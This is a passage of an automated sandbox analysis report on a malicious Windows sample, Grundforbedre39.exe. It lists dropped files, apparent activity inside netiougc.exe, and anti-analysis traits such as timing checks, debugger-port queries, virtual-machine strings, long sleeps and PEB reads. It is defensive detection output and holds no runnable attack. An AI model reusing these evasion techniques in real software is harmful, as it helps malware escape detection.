        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D3B971 push ebp; retf 9_2_04D3B976
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4E11B pushfd ; retf 9_2_04D4E133
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D5393A push ds; ret 9_2_04D5393C
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4FBD6 push ebx; retf 9_2_04D4FBEB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D4FBF3 push ebx; retf 9_2_04D4FBEB
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exeCode function: 9_2_04D393AF push ecx; retf 9_2_04D393B1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeFile created: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Grundforbedre39.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 rdtsc 4_2_35551763
        Source: C:\Windows\SysWOW64\netiougc.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep count: 120 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep time: -240000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exe TID: 3688Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -110000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep count: 52 > 30Jump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -52000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe TID: 8804Thread sleep time: -43500s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040635D FindFirstFileW,FindClose,0_2_0040635D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_0040580B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
        Source: Grundforbedre39.exe, 00000004.00000002.1265275828.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Grundforbedre39.exe, 00000004.00000002.1264916948.00000000051D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Grundforbedre39.exe, 00000004.00000002.1264916948.0000000005231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI call chain: ExitProcess graph end nodegraph_0-4538
        Source: C:\Users\user\Desktop\Grundforbedre39.exeAPI call chain: ExitProcess graph end nodegraph_0-4541
        Source: C:\Windows\SysWOW64\netiougc.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\netiougc.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 rdtsc 4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_00403863 GetTempPathW,GetUserDefaultUILanguage,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,LdrInitializeThunk,SystemParametersInfoW,LdrInitializeThunk,LdrInitializeThunk,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,0_2_00403863
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB55F mov eax, dword ptr fs:[00000030h]4_2_355EB55F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DA553 mov eax, dword ptr fs:[00000030h]4_2_355DA553
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35546540 mov eax, dword ptr fs:[00000030h]4_2_35546540
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35548540 mov eax, dword ptr fs:[00000030h]4_2_35548540
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552E547 mov eax, dword ptr fs:[00000030h]4_2_3552E547
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551254C mov eax, dword ptr fs:[00000030h]4_2_3551254C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552C560 mov eax, dword ptr fs:[00000030h]4_2_3552C560
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C51D mov eax, dword ptr fs:[00000030h]4_2_3559C51D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35531514 mov eax, dword ptr fs:[00000030h]4_2_35531514
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35512500 mov eax, dword ptr fs:[00000030h]4_2_35512500
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B502 mov eax, dword ptr fs:[00000030h]4_2_3550B502
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E507 mov eax, dword ptr fs:[00000030h]4_2_3553E507
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C50D mov eax, dword ptr fs:[00000030h]4_2_3554C50D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513536 mov eax, dword ptr fs:[00000030h]4_2_35513536
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35552539 mov eax, dword ptr fs:[00000030h]4_2_35552539
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541527 mov eax, dword ptr fs:[00000030h]4_2_35541527
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552252B mov eax, dword ptr fs:[00000030h]4_2_3552252B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355465D0 mov eax, dword ptr fs:[00000030h]4_2_355465D0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F5C7 mov eax, dword ptr fs:[00000030h]4_2_3550F5C7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C5FC mov eax, dword ptr fs:[00000030h]4_2_3559C5FC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551B5E0 mov eax, dword ptr fs:[00000030h]4_2_3551B5E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A5E7 mov ebx, dword ptr fs:[00000030h]4_2_3554A5E7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A5E7 mov eax, dword ptr fs:[00000030h]4_2_3554A5E7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355415EF mov eax, dword ptr fs:[00000030h]4_2_355415EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35542594 mov eax, dword ptr fs:[00000030h]4_2_35542594
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E588 mov eax, dword ptr fs:[00000030h]4_2_3558E588
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A580 mov eax, dword ptr fs:[00000030h]4_2_3554A580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35549580 mov eax, dword ptr fs:[00000030h]4_2_35549580
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF582 mov eax, dword ptr fs:[00000030h]4_2_355CF582
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355145B0 mov eax, dword ptr fs:[00000030h]4_2_355145B0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355985AA mov eax, dword ptr fs:[00000030h]4_2_355985AA
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554D450 mov eax, dword ptr fs:[00000030h]4_2_3554D450
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D454 mov eax, dword ptr fs:[00000030h]4_2_3551D454
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553E45E mov eax, dword ptr fs:[00000030h]4_2_3553E45E
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35520445 mov eax, dword ptr fs:[00000030h]4_2_35520445
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF478 mov eax, dword ptr fs:[00000030h]4_2_355CF478
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DA464 mov eax, dword ptr fs:[00000030h]4_2_355DA464
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF409 mov eax, dword ptr fs:[00000030h]4_2_355CF409
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A6400 mov eax, dword ptr fs:[00000030h]4_2_355A6400
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355A6400 mov eax, dword ptr fs:[00000030h]4_2_355A6400
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550640D mov eax, dword ptr fs:[00000030h]4_2_3550640D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B420 mov eax, dword ptr fs:[00000030h]4_2_3550B420
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35599429 mov eax, dword ptr fs:[00000030h]4_2_35599429
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547425 mov eax, dword ptr fs:[00000030h]4_2_35547425
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35547425 mov ecx, dword ptr fs:[00000030h]4_2_35547425
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559F42F mov eax, dword ptr fs:[00000030h]4_2_3559F42F
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355344D1 mov eax, dword ptr fs:[00000030h]4_2_355344D1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355344D1 mov eax, dword ptr fs:[00000030h]4_2_355344D1
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355314C9 mov eax, dword ptr fs:[00000030h]4_2_355314C9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF4FD mov eax, dword ptr fs:[00000030h]4_2_355CF4FD
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A4F0 mov eax, dword ptr fs:[00000030h]4_2_3554A4F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A4F0 mov eax, dword ptr fs:[00000030h]4_2_3554A4F0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355394FA mov eax, dword ptr fs:[00000030h]4_2_355394FA
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355454E0 mov eax, dword ptr fs:[00000030h]4_2_355454E0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4EF mov eax, dword ptr fs:[00000030h]4_2_3554E4EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4EF mov eax, dword ptr fs:[00000030h]4_2_3554E4EF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554B490 mov eax, dword ptr fs:[00000030h]4_2_3554B490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554B490 mov eax, dword ptr fs:[00000030h]4_2_3554B490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559C490 mov eax, dword ptr fs:[00000030h]4_2_3559C490
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35510485 mov ecx, dword ptr fs:[00000030h]4_2_35510485
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554648A mov eax, dword ptr fs:[00000030h]4_2_3554648A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554E4BC mov eax, dword ptr fs:[00000030h]4_2_3554E4BC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355124A2 mov eax, dword ptr fs:[00000030h]4_2_355124A2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355124A2 mov ecx, dword ptr fs:[00000030h]4_2_355124A2
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov ecx, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov eax, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3559D4A0 mov eax, dword ptr fs:[00000030h]4_2_3559D4A0
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355444A8 mov eax, dword ptr fs:[00000030h]4_2_355444A8
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554A750 mov eax, dword ptr fs:[00000030h]4_2_3554A750
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov ecx, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35532755 mov eax, dword ptr fs:[00000030h]4_2_35532755
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550F75B mov eax, dword ptr fs:[00000030h]4_2_3550F75B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355BE750 mov eax, dword ptr fs:[00000030h]4_2_355BE750
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35543740 mov eax, dword ptr fs:[00000030h]4_2_35543740
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554174A mov eax, dword ptr fs:[00000030h]4_2_3554174A
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35540774 mov eax, dword ptr fs:[00000030h]4_2_35540774
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514779 mov eax, dword ptr fs:[00000030h]4_2_35514779
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35514779 mov eax, dword ptr fs:[00000030h]4_2_35514779
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35551763 mov eax, dword ptr fs:[00000030h]4_2_35551763
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551471B mov eax, dword ptr fs:[00000030h]4_2_3551471B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551471B mov eax, dword ptr fs:[00000030h]4_2_3551471B
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF717 mov eax, dword ptr fs:[00000030h]4_2_355CF717
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551D700 mov ecx, dword ptr fs:[00000030h]4_2_3551D700
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3550B705 mov eax, dword ptr fs:[00000030h]4_2_3550B705
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3551170C mov eax, dword ptr fs:[00000030h]4_2_3551170C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3553270D mov eax, dword ptr fs:[00000030h]4_2_3553270D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35539723 mov eax, dword ptr fs:[00000030h]4_2_35539723
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513722 mov eax, dword ptr fs:[00000030h]4_2_35513722
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513722 mov eax, dword ptr fs:[00000030h]4_2_35513722
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355CF7CF mov eax, dword ptr fs:[00000030h]4_2_355CF7CF
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355177F9 mov eax, dword ptr fs:[00000030h]4_2_355177F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355177F9 mov eax, dword ptr fs:[00000030h]4_2_355177F9
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355137E4 mov eax, dword ptr fs:[00000030h]4_2_355137E4
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541796 mov eax, dword ptr fs:[00000030h]4_2_35541796
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35541796 mov eax, dword ptr fs:[00000030h]4_2_35541796
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3558E79D mov eax, dword ptr fs:[00000030h]4_2_3558E79D
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB781 mov eax, dword ptr fs:[00000030h]4_2_355EB781
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355EB781 mov eax, dword ptr fs:[00000030h]4_2_355EB781
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355E17BC mov eax, dword ptr fs:[00000030h]4_2_355E17BC
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355107A7 mov eax, dword ptr fs:[00000030h]4_2_355107A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_355DD7A7 mov eax, dword ptr fs:[00000030h]4_2_355DD7A7
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35545654 mov eax, dword ptr fs:[00000030h]4_2_35545654
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov eax, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov ecx, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554265C mov eax, dword ptr fs:[00000030h]4_2_3554265C
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_35513640 mov eax, dword ptr fs:[00000030h]4_2_35513640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3552F640 mov eax, dword ptr fs:[00000030h]4_2_3552F640
        Source: C:\Users\user\Desktop\Grundforbedre39.exeCode function: 4_2_3554C640 mov eax, dword ptr fs:[00000030h]4_2_3554C640
